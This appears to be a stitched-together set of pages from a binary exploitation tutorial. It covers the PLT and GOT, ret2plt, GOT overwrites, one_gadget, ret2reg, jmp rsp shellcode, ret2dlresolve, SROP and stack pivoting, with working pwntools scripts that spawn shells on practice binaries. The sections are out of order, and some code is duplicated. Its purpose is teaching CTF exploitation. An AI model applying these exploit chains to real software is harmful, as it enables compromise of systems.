bin.baddr 0x565ef000
0x565f01c9]> db 0x565f0234
[0x565f01c9]> dc
What's your name?
%3$p
Nice to meet you 0x565f01d5
p.recvuntil('name?\n')
p.sendline('%3$p')
p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)
elf.address = elf_leak - 0x11d5
log.success(f'PIE base: {hex(elf.address)}') # not required, but a nice check
So when it's on a new system, it replaces function calls with hardcoded addresses?
Not quite.
The problem with this approach is that it requires libc to have a constant base address, i.e. be loaded in the same area of memory every time the binary is run - but remember that ASLR exists. Due to the way ASLR works, these addresses need to be resolved every time the binary is run. Enter the PLT and GOT.
The PLT and GOT
The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to perform the linking.
When you call puts() in C and compile it as an ELF executable, it is not actually puts() - instead, it gets compiled as puts@plt. Check it out in GDB:
Why does it do that?
Well, as we said, it doesn't know where puts actually is - so it jumps to the PLT entry of puts instead. From here, puts@plt does some very specific things:
If there is a GOT entry for puts, it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.
The GOT is a massive table of addresses; these addresses are the actual locations in memory of the libc functions. puts@got, for example, will contain the address of puts in memory. When the PLT gets called, it reads the GOT address and redirects execution there. If the address is empty, it coordinates with the ld.so (also called the dynamic linker/loader) to get the function address and stores it in the GOT. This is done by calling _dl_runtime_resolve (this is explained in more detail in the ret2dlresolve section).
How is this useful for binary exploitation?
Well, there are two key takeaways from the above explanation:
Calling the PLT address of a function is equivalent to calling the function itself
The GOT address contains addresses of functions in libc, and the GOT is within the binary.
The use of the first point is clear - if we have a PLT entry for a desirable libc function, for example system, we can just redirect execution to its PLT entry and it will be the equivalent of calling system directly; no need to jump into libc.
The second point is less obvious, but debatably even more important. As the GOT is part of the binary, it will always be a constant offset away from the base. Therefore, if PIE is disabled or you somehow leak the binary base, you know the exact address that contains a libc function's address. If you perhaps have an arbitrary read, it's trivial to leak the real address of the libc function and therefore bypass ASLR.
Exploiting an Arbitrary Read
There are two main ways that one can exploit an arbitrary read for a stack exploit. Note that these approaches will cause not only the GOT entry to be returned but also everything after it until a null byte is reached, due to strings in C being null-terminated; make sure you only take the required number of bytes.
ret2plt
A ret2plt is a common technique that involves calling puts@plt and passing the GOT entry of puts as a parameter. This causes puts to print out its own address in libc. You then set the return address to the function you are exploiting, calling it again and allowing you to send a second payload - this time armed with the libc leak.
flat() packs all the values you give it with p32() and p64() (depending on context) and concatenates them, meaning you don't have to write the packing functions out all the time
%s format string
This has the same general theory but is useful when you have limited stack space or a ROP chain would alter the stack in such a way to complicate future payloads, for example when stack pivoting.
Summary
The PLT and GOT do the bulk of the dynamic linking
The PLT resolves actual locations in libc of functions you use and stores them in the GOT
Next time that function is called, the PLT reads the address from the GOT entry and calls it
Calling function@plt is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating libc base
ROP and Shellcode
Source
Super standard binary.
Exploitation
One Gadgets and Malloc Hook
Quick shells and pointers
A one_gadget is simply an execve("/bin/sh") call that is present in glibc; this can be a quick win with GOT overwrites - next time the function is called, the one_gadget is executed and a shell is popped.
__malloc_hook is a feature of glibc. The documentation defines __malloc_hook as:
The value of this variable is a pointer to the function that malloc uses whenever it is called.
Using ret2reg
Source
Any function that returns a pointer to the string once it acts on it is a prime target. There are many that do this, including gets(), strcpy() and fgets(). We'll keep it simple and use gets() as an example.
payload = p32(elf.got['puts']) # p64() if 64-bit
payload += b'|'
payload += b'%3$s' # The third parameter points at the start of the buffer
# this part is only relevant if you need to call the function again
payload = payload.ljust(40, b'A') # 40 is the offset until you're overwriting the instruction pointer
payload += p32(elf.symbols['main'])
# Send it off...
p.recvuntil(b'|') # This is not required
puts_leak = u32(p.recv(4)) # 4 bytes because it's 32-bit
Syscalls
Interfacing directly with the kernel
Overview
A syscall is a system call, and it is how the program asks the kernel to carry out specific tasks such as creating processes, handling I/O and anything else that requires kernel-level access.
Browsing the list of syscalls, you may notice that certain syscalls are similar to libc functions such as open(), fork() or read(); this is because these functions are simply wrappers around the syscalls, making it much easier for the programmer.
Triggering Syscalls
On 64-bit Linux, a syscall is triggered by the syscall instruction (on 32-bit, it's int 0x80). Once it's triggered, the kernel checks the value stored in RAX - this is the syscall number, which defines what syscall gets run. As per the syscall table, the other parameters are stored in RDI, RSI, RDX, etc, and every parameter has a different meaning for each syscall.
Execve
A notable syscall is execve, which executes the program passed to it in RDI. RSI and RDX hold argv and envp respectively.
This means that if there is no system() function, we can use execve to call /bin/sh instead - all we have to do is pass a pointer to /bin/sh in RDI and populate RSI and RDX with 0 (both argv and envp can be NULL when popping a shell).
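As a rough sketch of what such a chain looks like with plain pop gadgets (every address here is hypothetical - find the real ones with ROPgadget and strings):

```python
from pwn import *

context.clear(arch='amd64')

BINSH   = 0x402000        # hypothetical address of a "/bin/sh" string in the binary
POP_RAX = 0x401001        # hypothetical gadget addresses
POP_RDI = 0x401003
POP_RSI = 0x401005
POP_RDX = 0x401007
SYSCALL = 0x401009

chain = flat(
    POP_RAX, 0x3b,        # execve is syscall 59 (0x3b)
    POP_RDI, BINSH,       # RDI = pointer to "/bin/sh"
    POP_RSI, 0,           # RSI = argv = NULL
    POP_RDX, 0,           # RDX = envp = NULL
    SYSCALL
)
```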
ret2reg
Using Registers to bypass ASLR
ret2reg simply involves jumping to register addresses rather than hardcoded addresses, much like Using RSP for Shellcode. For example, you may find RAX always points at your buffer when the ret is executed, so you could utilise a call rax or jmp rax to continue from there.
The reason RAX is the most common for this technique is that, by convention, the return value of a function is stored in RAX. For example, take the following basic code:
#include <stdio.h>
int test() {
return 0xdeadbeef;
}
int main() {
test();
return 0;
}
If we compile and disassemble the function, we get this:
As you can see, the value 0xdeadbeef is being moved into EAX.
Let's get all the basic setup done.
Now we're going to do something interesting - we are going to call gets again. Most importantly, we will tell gets to write the data it receives to a section of the binary. We need somewhere both readable and writeable, so I choose the GOT. We pass a GOT entry to gets, and when it receives the shellcode we send it will write the shellcode into the GOT. Now we know exactly where the shellcode is. To top it all off, we set the return address of our call to gets to where we wrote the shellcode, perfectly executing what we just inputted.
Final Exploit
64-bit
I wonder what you could do with this.
ASLR
No need to worry about ASLR! Neither the stack nor libc is used, save for the ROP.
The real problem would be if PIE was enabled, as then you couldn't call gets as the location of the PLT would be unknown without a leak - same problem with writing to the GOT.
Potential Problems
Thanks to clubby789 and Faith from the HackTheBox Discord server, I found out that the GOT often has executable permissions simply because that's the default when there's no NX. On more recent kernels, such as 5.9.0 and later, the default has changed and the GOT no longer has executable permissions.
As such, if your exploit is failing, run uname -r to grab the kernel version and check whether it's 5.9.0 or newer; if it is, you'll have to find another RWX region to place your shellcode (if one exists!).
To summarise, when you call malloc(), the function that __malloc_hook points to also gets called - so if we can overwrite the hook with, say, a one_gadget, and somehow trigger a call to malloc(), we get an easy shell.
Finding One_Gadgets
Luckily there is a tool written in Ruby called one_gadget. To install it, run:
And then you can simply run
For most one_gadgets, certain criteria have to be met. This means they won't all work - in fact, none of them may work.
Triggering malloc()
Wait a sec - isn't malloc() a heap function? How will we use it on the stack? Well, you can actually trigger malloc by calling printf("%10000$c") (this allocates too many bytes for the stack, forcing libc to allocate the space on the heap instead). So, if you have a format string vulnerability, calling malloc is trivial.
Practise
This is a hard technique to give you practise on, due to the fact that your libc version may not even have working one_gadgets. As such, feel free to play around with the GOT overwrite binary and see if you can get a one_gadget working.
Remember, the value given by the one_gadget tool needs to be added to libc base as it's just an offset.
#include <stdio.h>
void vuln() {
char buffer[20];
puts("Give me the input");
gets(buffer);
}
int main() {
vuln();
return 0;
}
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
rop = ROP(elf)
rop.raw('A' * 32)
rop.gets(elf.got['puts']) # Call gets, writing to the GOT entry of puts
rop.raw(elf.got['puts']) # now our shellcode is written there, we can continue execution from there
p.recvline()
p.sendline(rop.chain())
p.sendline(asm(shellcraft.sh()))
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
rop = ROP(elf)
rop.raw('A' * 32)
rop.gets(elf.got['puts']) # Call gets, writing to the GOT entry of puts
rop.raw(elf.got['puts']) # now our shellcode is written there, we can continue execution from there
p.recvline()
p.sendline(rop.chain())
p.sendline(asm(shellcraft.sh()))
p.interactive()
gem install one_gadget
one_gadget libc
Analysis
First, let's make sure that some register does point to the buffer:
Now we'll set a breakpoint on the ret in vuln(), continue and enter text.
We've hit the breakpoint; let's check if RAX points to our buffer. We'll check RAX first because that's the traditional register for the return value.
And indeed it does!
Exploitation
We now just need a jmp rax gadget or equivalent. I'll use ROPgadget for this and look for either jmp rax or call rax:
There's a jmp rax at 0x40109c, so I'll use that. The padding up until RIP is 120; I assume you can calculate this yourselves by now, so I won't bother showing it.
You can ignore most of it, as it's mostly there to accommodate the existence of jmp rsp - we don't actually want it executed during normal flow, so it's guarded by an if condition that is never true.
The chance of jmp esp gadgets existing in the binary is incredibly low, but what you often do instead is find a sequence of bytes that encodes jmp rsp and jump there - jmp rsp assembles to \xff\xe4, so if any part of the executable section contains bytes in this order, they can be used as if they were a jmp rsp.
Exploitation
Try to do this yourself first, using the explanation on the previous page. Remember, RSP points at the thing after the return pointer once ret has occurred, so your shellcode goes after it.
Solution
Limited Space
You won't always have enough overflow - perhaps you'll only have 7 or 8 bytes. What you can do in this scenario is make the shellcode after RIP equivalent to something like sub rsp, 0x20; jmp rsp.
Where 0x20 is the offset between the current value of RSP and the start of the buffer. In the buffer itself, we put the main shellcode. Let's try that!
The 10 is just a placeholder. Once we hit the pause(), we attach with radare2 and set a breakpoint on the ret, then continue. Once we hit it, we find the beginning of the A string and work out the offset between that and the current value of RSP - it's 128!
Solution
We successfully pivoted back to our shellcode - and because all our addresses are relative, it's completely reliable! ASLR beaten with pure shellcode.
This is harder with PIE as the location of jmp rsp will change, so you might have to leak PIE base!
Exploitation
Source
To display an example program, we will use the example given on the pwntools entry for ret2dlresolve:
Exploitation
pwntools contains a fancy Ret2dlresolvePayload that can automate the majority of our exploit:
Let's use rop.dump() to break down what's happening.
As we expected - it's a read followed by a call to plt_init with the parameter 0x0804ce24. Our fake structures are being read in at 0x804ce00. The logging at the top tells us where all the structures are placed.
Now we know where the fake structures are placed. Since I ran the script with the DEBUG parameter, I'll check what gets sent.
system is being written to 0x804ce00 - which, as the debug output told us, is where the Symbol name addr would be placed
After that, at 0x804ce0c, the Elf32_Sym struct starts. First it contains the table index of that string, which in this case is 0x4ba4 as it is a very long way off the actual table. Next it contains the other values in the struct, but they are irrelevant and so zeroed out.
At 0x804ce1c the Elf32_Rel struct starts; first it contains the address of the system string, 0x0804ce00, then the r_info variable - if you remember, this specifies the R_SYM, which is used to link the SYMTAB and the STRTAB.
After all the structures we place the string /bin/sh at 0x804ce24 - which, if you remember, was the argument passed to system when we printed the rop.dump():
To make it super simple, I made it in assembly using pwntools:
The binary contains all the gadgets you need! First it executes a read syscall, writes to the stack, then the ret occurs and you can gain control.
But what about the /bin/sh? I slightly cheesed this one and couldn't be bothered to add it to the assembly, so I just did:
Exploitation
As we mentioned before, we need the following layout in the registers:
To get the address of the gadgets, I'll just do objdump -d vuln. The address of /bin/sh can be gotten using strings:
The offset from the base to the string is 0x1250 (-t x tells strings to print the offset as hex). Armed with all this information, we can set up the constants:
Now we just need to populate the registers. I'll tell you the padding is 8 to save time:
And wehey - we get a shell!
ret2dlresolve
Resolving our own libc functions
Broad Overview
During a ret2dlresolve, the attacker tricks the binary into resolving a function of its choice (such as system) into the PLT. This then means the attacker can use the PLT function as if it was originally part of the binary, bypassing ASLR (if present) and requiring no libc leaks.
[0x7f8ac76fa090]> db 0x0040113d
[0x7f8ac76fa090]> dc
hello
hit breakpoint at: 40113d
[0x0040113d]> dr rax
0x7ffd419895c0
[0x0040113d]> ps @ 0x7ffd419895c0
hello
$ ROPgadget --binary vuln | grep -iE "(jmp|call) rax"
0x0000000000401009 : add byte ptr [rax], al ; test rax, rax ; je 0x401019 ; call rax
0x0000000000401010 : call rax
0x000000000040100e : je 0x401014 ; call rax
0x0000000000401095 : je 0x4010a7 ; mov edi, 0x404030 ; jmp rax
0x00000000004010d7 : je 0x4010e7 ; mov edi, 0x404030 ; jmp rax
0x000000000040109c : jmp rax
0x0000000000401097 : mov edi, 0x404030 ; jmp rax
0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x000000000040100c : test eax, eax ; je 0x401016 ; call rax
0x0000000000401093 : test eax, eax ; je 0x4010a9 ; mov edi, 0x404030 ; jmp rax
0x00000000004010d5 : test eax, eax ; je 0x4010e9 ; mov edi, 0x404030 ; jmp rax
0x000000000040100b : test rax, rax ; je 0x401017 ; call rax
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
JMP_RAX = 0x40109c
payload = asm(shellcraft.sh()) # front of buffer <- RAX points here
payload = payload.ljust(120, b'A') # pad until RIP
payload += p64(JMP_RAX) # jump to the buffer - return value of gets()
p.sendline(payload)
p.interactive()
#include <stdio.h>
int test = 0;
int main() {
char input[100];
puts("Get me with shellcode and RSP!");
gets(input);
if(test) {
asm("jmp *%rsp");
return 0;
}
else {
return 0;
}
}
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
elf = ELF.from_assembly(
'''
mov rdi, 0;
mov rsi, rsp;
sub rsi, 8;
mov rdx, 300;
syscall;
ret;
pop rax;
ret;
pop rdi;
ret;
pop rsi;
ret;
pop rdx;
ret;
'''
)
elf.save('vuln')
CSU Hardening
As of glibc 2.34, the CSU has been hardened to remove the useful gadgets. This patch is the offender, and it essentially removes __libc_csu_init (as well as a couple of other functions) entirely.
Unfortunately, changing this breaks the ABI (application binary interface), meaning that any binaries compiled in this way can not run on pre-2.34 glibc versions - which can make things quite annoying for CTF challenges if you have an outdated glibc version. Older compilations, however, can work on the newer versions.
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
# we use elf.search() because we don't need those instructions directly,
# just any sequence of \xff\xe4
jmp_rsp = next(elf.search(asm('jmp rsp')))
payload = flat(
'A' * 120, # padding
jmp_rsp, # RSP will be pointing to shellcode, so we jump there
asm(shellcraft.sh()) # place the shellcode
)
p.sendlineafter('RSP!\n', payload)
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
jmp_rsp = next(elf.search(asm('jmp rsp')))
payload = asm(shellcraft.sh())
payload = payload.ljust(120, b'A')
payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 128;
jmp rsp;
''') # 128 we found with r2
p.sendlineafter('RSP!\n', payload)
p.interactive()
# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the correct, calculated reloc_offset
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all the relevant structures in
[DEBUG] PLT 0x8049030 read
[DEBUG] PLT 0x8049040 __libc_start_main
[DEBUG] Symtab: 0x804820c
[DEBUG] Strtab: 0x804825c
[DEBUG] Versym: 0x80482a6
[DEBUG] Jmprel: 0x80482d8
[DEBUG] ElfSym addr: 0x804ce0c
[DEBUG] ElfRel addr: 0x804ce1c
[DEBUG] Symbol name addr: 0x804ce00
[DEBUG] Version index addr: 0x8048c26
[DEBUG] Data addr: 0x804ce00
[DEBUG] PLT_INIT: 0x8049020
[*] 0x0000: b'AAAA' 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[...]
0x004c: 0x8049030 read(0, 0x804ce00)
0x0050: 0x804921a <adjust @0x5c> pop edi; pop ebp; ret
0x0054: 0x0 arg0
0x0058: 0x804ce00 arg1
0x005c: 0x8049020 [plt_init] system(0x804ce24)
0x0060: 0x4b44 [dlresolve index]
0x0064: b'zaab' <return address>
0x0068: 0x804ce24 arg0
[DEBUG] ElfSym addr: 0x804ce0c
[DEBUG] ElfRel addr: 0x804ce1c
[DEBUG] Symbol name addr: 0x804ce00
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = elf.process()
rop = ROP(elf)
# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the correct, calculated reloc_offset
log.info(rop.dump())
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all the relevant structures in
p.interactive()
echo -en "/bin/sh\x00" >> vuln
RAX: 0x3b
RDI: pointer to /bin/sh
RSI: 0x0
RDX: 0x0
Dynamically-linked ELF objects import libc functions when they are first called using the PLT and GOT. During the relocation of a runtime symbol, RIP will jump to the PLT and attempt to resolve the symbol. During this process a "resolver" is called.
For all these screenshots, I broke at read@plt. I'm using GDB with the pwndbg plugin as it shows it a bit better.
The PLT jumps to wherever the GOT points. Originally, before the GOT is updated, it points back to the instruction after the jmp in the PLT to resolve it.
In order to resolve the functions, there are 3 structures that need to exist within the binary. Faking these 3 structures could enable us to trick the linker into resolving a function of our choice, and we can also pass parameters in (such as /bin/sh) once resolved.
Structures
There are 3 structures we need to fake.
JMPREL
The JMPREL segment (.rel.plt) stores the Relocation Table, which maps each entry to a symbol.
These entries are of type Elf32_Rel:
The column name corresponds to our symbol name. The offset is the GOT entry for our symbol. info stores additional metadata.
Note that due to this, the R_SYM of gets is 1, as 0x107 >> 8 = 1.
STRTAB
Much simpler - just a table of strings for the names.
0x0804825c is the location of STRTAB we got earlier
SYMTAB
Symbol information is stored here in an Elf32_Sym struct:
The most important value here is st_name as this gives the offset in STRTAB of the symbol name. The other fields are not relevant to the exploit itself.
Linking the Structures
We now know we can get the STRTAB offset of the symbol's string using the R_SYM value we got from the JMPREL, combined with SYMTAB:
Here we're reading SYMTAB + R_SYM * size (16), and it appears that the offset (the st_name field of the SYMTAB entry) is 0x10.
And if we read that offset on STRTAB, we get the symbol's name!
More on the PLT and GOT
Let's hop back to the GOT and PLT for a slightly more in-depth look.
If the GOT entry is unpopulated, we push the reloc_offset value and jump to the beginning of the .plt section. A few instructions later, the dl-resolve() function is called, with reloc_offset being one of the arguments. It then uses this reloc_offset to calculate the relocation and symtab entries.
File descriptors are integers that represent connections to sockets, files or whatever else you're connecting to. In Unix systems, there are 3 main file descriptors (often abbreviated fd) for each application:
stdin (standard input) - fd 0
stdout (standard output) - fd 1
stderr (standard error) - fd 2
These are, as shown above, standard input, output and error. You've probably used them before yourself, for example to hide errors when running commands:
Here you're piping stderr to /dev/null, which is the same principle.
File Descriptors and Sockets
Many binaries in CTFs use programs such as socat to redirect stdin and stdout (and sometimes stderr) to the user when they connect. These are super simple and often require no more than swapping the p = process() line in your exploit for p = remote(host, port).
Others, however, implement their own socket programming in C. In these scenarios, stdin and stdout may not be shown back to the user.
The reason for this is that every new connection gets a different fd. If you listen in C, since fds 0-2 are reserved, the listening socket will often be assigned fd 3. Once a user connects, the connection is given another fd - fd 4 (neither the 3 nor the 4 is guaranteed, but they are statistically likely).
Exploitation with File Descriptors
In these scenarios, it's just as simple to pop a shell. This shell, however, is not shown back to the user - it's shown back to the terminal running the server. Why? Because it utilises fd 0, 1 and 2 for its I/O.
Here we have to tell the program to duplicate the file descriptor in order to redirect stdin and stderr to fd 4, and glibc provides a simple way to do so.
The dup syscall (and C function) duplicates the fd passed to it onto the lowest-numbered free fd. However, we need to target fds 0 and 1 specifically, so we use dup2() instead. dup2() takes two parameters, oldfd and newfd, and duplicates oldfd onto newfd - so calling dup2(4, 0) and dup2(4, 1) redirects stdin and stdout to our socket, allowing us to actually interact with any shell we may have popped.
Note that the man page outlines how, if newfd is already in use, it is silently closed first - which is exactly what we want.
Using SROP
Source
As with the syscalls, I made the binary using the pwntools ELF features:
It's quite simple - a read syscall, followed by a pop rax; ret gadget. You can't control RDI/RSI/RDX, which you need to pop a shell, so you'll have to use SROP.
Once again, I added /bin/sh to the binary:
Exploitation
First let's plonk down the available gadgets and their location, as well as the location of /bin/sh.
From here, I suggest you try the payload yourself. The padding (as you can see in the assembly) is 8 bytes until RIP, then you'll need to trigger a sigreturn, followed by the values of the registers.
The triggering of a sigreturn is easy - sigreturn is syscall 0xf (15), so we just pop that into RAX and call syscall:
Now the syscall looks at the location of RSP for the register values; we'll have to fake them. They have to be in a specific order, but luckily for us pwntools has a cool feature called a SigreturnFrame() that handles the order for us.
Now we just need to decide what the register values should be. We want to trigger an execve() syscall, so we'll set the registers to the values we need for that:
However, in order to trigger this we also have to control RIP and point it back at the syscall gadget, so the execve actually executes:
We then append it to the payload and send.
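A minimal sketch of the whole thing as described above (the gadget addresses and the location of /bin/sh are hypothetical; the 8 bytes of padding comes from the assembly we generated):

```python
from pwn import *

context.clear(arch='amd64')

BINSH   = 0x402000            # hypothetical address of "/bin/sh" in the binary
POP_RAX = 0x401004            # hypothetical pop rax; ret
SYSCALL = 0x401006            # hypothetical syscall; ret

frame = SigreturnFrame()      # pwntools handles the register ordering for us
frame.rax = 0x3b              # execve
frame.rdi = BINSH             # pointer to "/bin/sh"
frame.rsi = 0                 # argv = NULL
frame.rdx = 0                 # envp = NULL
frame.rip = SYSCALL           # point RIP back at the syscall gadget so execve runs

payload  = b'A' * 8                   # padding to the return pointer
payload += p64(POP_RAX) + p64(0xf)    # sigreturn is syscall 15 (0xf)
payload += p64(SYSCALL)               # trigger the sigreturn...
payload += bytes(frame)               # ...which loads all of these register values at once
```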
Final Exploit
Exploitation
Source
Obviously, you can do a ret2plt followed by a ret2libc, but that's really not the point of this. Try calling win(), and to do that you have to populate the register rdx. Try what we've talked about, and then have a look at the answer if you get stuck.
Analysis
We can work out the addresses of the massive chains using r2, and chuck this all into pwntools.
Note I'm not popping RBX, despite the call using it. This is because RBX ends up being 0 anyway, and you want to mess with as few registers as possible to ensure the best chance of success.
Exploitation
Finding a win()
Now we need to find a memory location that has the address of win() written into it so that we can point r15 at it. I'm going to opt to call gets() again instead, and then input the address. The location we input to is a fixed location of our choice, which is reliable. Now we just need to find a location.
To do this, I'll run r2 on the binary, then dcu main to continue until main. Now let's check the memory permissions:
The third location is RW, so let's check it out.
The address 0x404028 appears unused, so I'll write win() there.
Reading in win()
To do this, I'll just use the ROP class.
Popping the registers
Now we have the address written there, let's just get the massive ropchain and plonk it all in
Sending it off
Don't forget to pass a parameter to the gets():
Final Exploit
And we have successfully controlled RDX - without any RDX gadgets!
Simplification
As you probably noticed, we don't need to pop r12 or r13, so we can move POP_CHAIN a couple of instructions along:
Forking Processes
Flaws with fork()
Some processes use fork() to deal with multiple requests at once, most notably servers.
An interesting side-effect of fork() is that memory is copied exactly. This means everything is identical - ELF base, libc base, canaries.
This "shared" memory is interesting from an attacking point of view as it allows us to do a byte-by-byte bruteforce. Simply put, if there is a response from the server when we send a message, we can work out when it crashed. We keep spamming bytes until there's a response. If the server crashes, the byte is wrong. If not, it's correct.
This allows us to bruteforce the RIP one byte at a time, essentially leaking PIE - and the same thing for canaries and RBP. 24 bytes of multithreaded bruteforce, and once you leak all of those you can bypass a canary, get a stack leak from RBP and PIE base from RIP.
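As a rough sketch of the idea for the canary (the server address, "still alive" message and offset are all hypothetical, and this assumes the input is taken with read() so the remaining canary bytes stay untouched):

```python
from pwn import *

context.log_level = 'error'           # keep the output quiet during the bruteforce

def survives(data: bytes) -> bool:
    """Send an overflow and report whether the forked child kept running."""
    p = remote('127.0.0.1', 9001)     # hypothetical forking server
    p.send(data)
    try:
        response = p.recvuntil(b'Thanks!', timeout=1)   # hypothetical "still alive" message
        return b'Thanks!' in response
    except EOFError:
        return False
    finally:
        p.close()

OFFSET = 64                           # hypothetical padding up to the canary
canary = b'\x00'                      # the least significant byte of the canary is always 00
while len(canary) < 8:
    for guess in range(256):
        if survives(b'A' * OFFSET + canary + bytes([guess])):
            canary += bytes([guess])
            break
print(f'Canary: {hex(u64(canary))}')
```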
I won't be making a binary for this (yet), but you can check out Rope from HackTheBox - root was this exact technique.
Exploitation
Stack Pivoting
Source
It's fairly clear what the aim is - call winner() with the two correct parameters. The fgets() means there's a limited number of bytes we can overflow, and it's not enough for a regular ROP chain. There's also a leak to the start of the buffer, so we know where to set RSP to.
We'll try two ways - using pop rsp
Sigreturn-Oriented Programming (SROP)
Controlling all registers at once
Overview
A sigreturn is a special type of syscall. The purpose of sigreturn is to return from the signal handler and to clean up the stack frame after a signal has been unblocked.
What this involves is storing all the register values on the stack. Once the signal is unblocked, all the values are popped back in (RSP points to the bottom of the sigreturn frame, this collection of register values).
Socat
More on socat
socat is a "multipurpose relay" often used to serve binary exploitation challenges in CTFs. Essentially, it transfers stdin and stdout to the socket and also allows simple forking capabilities. The following is an example of how you could host a binary on port 5000:
Most of the command is fairly logical (and the rest you can look up). The important part is that in this scenario we don't have to redirect the file descriptors ourselves, as socat does it all for us.
What is important, however, is pty mode.
Stack Pivoting
Lack of space for ROP
Overview
Stack Pivoting is a technique we use when we lack space on the stack - for example, we have 16 bytes past RIP. In this scenario, we're not able to complete a full ROP chain.
During Stack Pivoting, we take control of the RSP register and "fake" the location of the stack. There are a few ways to do this.
leave
Using leave; ret to stack pivot
Exploitation
By calling leave; ret twice, as described, this happens:
By controlling the value popped into RBP, we can control RSP.
Exploit
Duplicating the Descriptors
Source
I'll include source.c, but most of it is standard socket programming. The two relevant functions - vuln() and win() - I'll list below.
Quite literally an easy ret2win.
$readelf -d source
Dynamic section at offset 0x2f14 contains 24 entries:
Tag Type Name/Value
0x00000005 (STRTAB) 0x804825c
0x00000006 (SYMTAB) 0x804820c
0x00000017 (JMPREL) 0x80482d8
[...]
$readelf -r source
Relocation section '.rel.dyn' at offset 0x2d0 contains 1 entry:
Offset Info Type Sym.Value Sym. Name
0804bffc 00000206 R_386_GLOB_DAT 00000000 __gmon_start__
Relocation section '.rel.plt' at offset 0x2d8 contains 2 entries:
Offset Info Type Sym.Value Sym. Name
0804c00c 00000107 R_386_JUMP_SLOT 00000000 gets@GLIBC_2.0
0804c010 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main@GLIBC_2.0
typedef uint32_t Elf32_Addr;
typedef uint32_t Elf32_Word;
typedef struct
{
Elf32_Addr r_offset; /* Address */
Elf32_Word r_info; /* Relocation type and symbol index */
} Elf32_Rel;
/* How to extract and insert information held in the r_info field. */
#define ELF32_R_SYM(val) ((val) >> 8)
#define ELF32_R_TYPE(val) ((val) & 0xff)
typedef struct
{
Elf32_Word st_name ; /* Symbol name (string tbl index) */
Elf32_Addr st_value ; /* Symbol value */
Elf32_Word st_size ; /* Symbol size */
unsigned char st_info ; /* Symbol type and binding */
unsigned char st_other ; /* Symbol visibility under glibc>=2.2 */
Elf32_Section st_shndx ; /* Section index */
} Elf32_Sym ;
By leveraging a sigreturn, we can control all register values at once - amazing! Yet this is also a drawback - we can't pick-and-choose registers, so if we don't have a stack leak it'll be hard to set registers like RSP to a workable value. Nevertheless, this is a super powerful technique - especially with limited gadgets.
Moving onto heap exploitation does not require you to be a god at stack exploitation, but it will require a better understanding of C and how concepts such as pointers work. From time to time we will be discussing the glibc source code itself, and while this can be really overwhelming, it's incredibly good practise.
I'll do everything I can to make it as simple as possible. Most references (to start with) will be hyperlinks, so feel free to just keep the concept in mind for now; as you progress, understanding the source will become more and more important.
Occasionally different snippets of code will be from different glibc versions, and I'll do my best to note down which version they are from. The reason for this is that newer versions have a lot of protections that will obscure the basic logic of the operation, so we will start with older implementations and build up.
Pointer Authentication
An Arm hardware protection to combat ROP
Overview
Pointer Authentication is a hardware feature available for Arm devices to protect against ROP attacks. A Pointer Authentication Code (PAC) is generated from the value of a given pointer, and must be used to verify pointers before using them. This protection requires hardware support, as the assembly instructions (such as paciasp and retaa) that are required for this must exist on the processor, and compiler support.
PAC has two keys, called Key A and Key B. The instruction paciasp will sign the Link Register (lr) using Key A and the SP register, and is often used at function entry (to store the return pointer). pacibsp will do the same, but with Key B.
At function exit, when LR is popped off the stack, we use the retaa instruction instead. This instruction authenticates the address in LR using Key A and SP and branches to the authenticated address. retab is used for Key B instead.
pty mode allows you to communicate with the process as if you were a user, so it takes input literally - including DELETE characters. If you send a \x7f - a DELETE - it will literally delete the previous character (as shown shortly in my writeup). This is incredibly relevant because in 64-bit the \x7f is almost always present in glibc addresses, so it's not quite so possible to avoid (although you could keep rerunning the exploit until the rare occasion you get an 0x7e... libc base).
To bypass this, we use the socat pty escape character \x16 and prepend it to any \x7f we send across.
Possibly the simplest, but also the least likely to exist, is a pop rsp gadget. If there is one of these, you're quite lucky.
xchg <reg>, rsp
If you can find a pop <reg> gadget, you can then use this xchg gadget to swap the values with the ones in RSP. Requires about 16 bytes of stack space after the saved return pointer:
leave; ret
This is a very interesting way of stack pivoting, and it only requires 8 bytes.
Every function (except main) is ended with a leave; ret. leave is equivalent to mov rsp, rbp followed by pop rbp.
Note that the function epilogue therefore looks like mov rsp, rbp; pop rbp; ret.
That means that when we overwrite RIP, the 8 bytes before it overwrite the saved RBP (you may have noticed this before). So, cool - we can control RBP. How does that help us?
Well, if we look at leave again, we notice that the value in RBP gets moved into RSP! So if we overwrite RBP and then overwrite RIP with the address of another leave; ret, the value we placed in RBP gets moved into RSP. And, even better, we don't need any more stack space than just overwriting RIP, making it very compact.
Gadgets
As before, but with a difference:
Testing the leave
I won't bother stepping through it again - if you want that, check out the pop rsp walkthrough.
Essentially, that pops buffer into RSP (as described previously).
Full Payload
You might be tempted to just chuck the payload into the buffer and boom, RSP points there - but not quite. As with the previous approach, there is a pop instruction that needs to be accounted for; remember, leave ends with a pop rbp.
So once you overwrite RSP, you still need to give a value for the pop rbp.
